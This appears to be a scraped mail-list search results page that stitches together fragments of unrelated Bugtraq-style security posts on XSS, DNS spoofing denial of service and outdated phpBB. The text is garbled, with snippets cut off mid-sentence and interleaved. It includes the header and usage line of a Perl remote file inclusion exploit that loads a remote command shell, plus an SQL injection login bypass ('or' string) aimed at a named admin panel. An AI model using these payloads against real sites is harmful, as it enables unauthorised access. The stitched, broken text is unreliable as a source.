In a post-disclosure analysis [1] of a security issue announced by
rgod [2], Siegfried observed that the reported XSS actually originated
from a file inclusion vulnerability, in which the XSS was reflected
back from an error message when the file inclusion failed:
About the xss, it is an xss in
Vendor : linksubmit
Version : All Version
www : http://www.phpselect.com
AUTHOR : s3rv3r_hack3r
you can submit html tag's in $description (linksubmit.php)
Exploit :
#!/usr/bin/perl
#
# Exploit by s3rv3r_hack3r
# Special Thanx : hessamx , f0rk ,sattar.li , stanic, mfox,blood moon and..
Geo. wrote:
The flood is a flood of answers not queries, you spoof the source address of
a query with the address of your target, the target gets the response from
the dns server. A cache on the dns server just makes it a more efficient
response.
Queries are bad enough. This can be played with
About that xss, it was really a normal xss, like i wrote in my second post
(i respect rgod's work because he always made good analysis and good
advisories). But there are indeed many vulnerabilities that are classified
as XSS while they were much more than a XSS, or a XSS in a PHP error
message.
Description :
/* =
File created by Andries Bruinsma
(c) FleXiBle Development (FXB)
Web: http://www.ahbruinsma.nl
Email: [EMAIL PROTECTED]
===
File: main.php
Version: 3.0
Date started: 10th
Using 2.06 is a guaranteed ticket to your web site being hacked. phpBB is at
2.19 at the moment and there have been major security flaws found in each
previous version - including 2.06
Patch your 2.06 up to 2.19 or die... because there are bots out there that are
looking for lazy web admins
Hello, Bugtraq,
I am not quite sure this hasn't been already discussed before, if so,
please excuse me...
There were quite a lot of DNS DoS-ing with spoofed udp-related
messages here recently. What I'd like to discuss is something similar in
concept - a denial of service via spoofing the source
#!/usr/bin/perl
##
# PHPNuke-Clan 3.0.1 Remote File Inclusion Exploit
# Bug Found By uid0 code by zod
##
# (c) 2006
# ExploiterCode.com
##
# usage:
# perl pnc.pl location of PNC cmd shell location cmd shell variable
#
# perl pnc.pl http://site.com/PNC/ http://site.com/cmd.txt cmd
#
# cmd shell
Hello Bugtraq,
we would like to announce the recent GeSWall update. GeSWall is an
intrusion prevention system for Windows. It applies a security policy
that effectively precludes damage from various attacks and malicious
software.
Instead of blocking particular attack techniques GeSWall focuses
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Stephen Samuel wrote:
| To put it another way: UDP as a purely connectionless
| protocol is fast becoming a liability in situations where
| significant amplification is possible.
My thoughts exactly. This attack is possible because of a design
Vendor : SiteMan
Target Page : admin_login.asp
Bug Finder : S3rv3r_hack3r
administrator panel (demo): http://www.ispdemos.com/Demo/SiteMan/admin_login.asp
WWW : http://www.ispofegypt.com/
you can login to admin_login.asp with
user : admin
pass : ' or '
11 matches
Mail list logo